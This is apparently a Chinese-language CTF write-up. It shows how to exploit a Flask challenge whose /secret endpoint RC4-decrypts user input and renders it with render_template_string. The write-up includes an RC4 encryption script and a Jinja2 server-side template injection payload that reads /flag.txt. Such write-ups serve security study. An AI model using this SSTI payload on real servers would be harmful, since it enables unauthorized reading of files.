打开靶机可以发现什么都没有,扫目录发现robots.txt,console(secret页面不知道为啥我开始没有扫出来)
进入console是一个交互平台,需要pin值,有点像python的debug(我开始还在这里看了很久的js文件)
robots.txt我以为会给几个地址呢,结果告诉是一个安卓ctf,对于现在水平的我感觉没多大帮助
secret终于有用了,告诉我们给他一个secret值,它会加密让别人看不见,不知道是不是flag,试试吧,便用GET或者POST方法上传secret参数试试
不知道一个什么加密算法 ,还是回到python中flask框架开启了debug模块
随便输入什么让他报错
File "/app/app.py", line 35, in secret
if(secret==None):
return 'Tell me your secret.I will encrypt it so others can\'t see'
rc=rc4_Modified.RC4("HereIsTreasure") #解密
deS=rc.do_crypt(secret)
a=render_template_string(safe(deS))
if 'ciscn' in a.lower():
return 'flag detected!'
Open an interactive python shell in this frame return a
找到关于secret相关的源码报错地方,可以看到他这里用的是RC4加密
密匙就是HereIsTreasure,然后将我们上传的secret进行解密,接下来是典型的模板注入最熟悉的render渲染,如果选完后的文字全部小写化后有ciscn,会返回flag查到,于是我们上网找一个RC4的加密脚本
import base64
from urllib.parse import quote
def rc4_main(key = "HereIsTreasure", message = "ciscn"):
# print("RC4加密主函数")
s_box = rc4_init_sbox(key)
crypt = str(rc4_excrypt(message, s_box))
return crypt
def rc4_init_sbox(key):
s_box = list(range(256)) # 我这里没管秘钥小于256的情况,小于256不断重复填充即可
# print("原来的 s 盒:%s" % s_box)
j = 0
for i in range(256):
j = (j + s_box[i] + ord(key[i % len(key)])) % 256
s_box[i], s_box[j] = s_box[j], s_box[i]
# print("混乱后的 s 盒:%s"% s_box)
return s_box
def rc4_excrypt(plain, box):
# print("调用加密程序成功。")
res = []
i = j = 0
for s in plain:
i = (i + 1) % 256
j = (j + box[i]) % 256
box[i], box[j] = box[j], box[i]
t = (box[i] + box[j]) % 256
k = box[t]
res.append(chr(ord(s) ^ k))
# print("res用于加密字符串,加密后是:%res" %res)
cipher = "".join(res)
print("加密后的字符串是:%s" %quote(cipher))
#print("加密后的输出(经过编码):")
#print(str(base64.b64encode(cipher.encode('utf-8')), 'utf-8'))
return (str(base64.b64encode(cipher.encode('utf-8')), 'utf-8'))
rc4_main("HereIsTreasure","{{''.__class__.__mro__.__getitem__(2).__subclasses__().pop(40)('/flag.txt').read()}}")
将加密后的字符串传入secret参数即可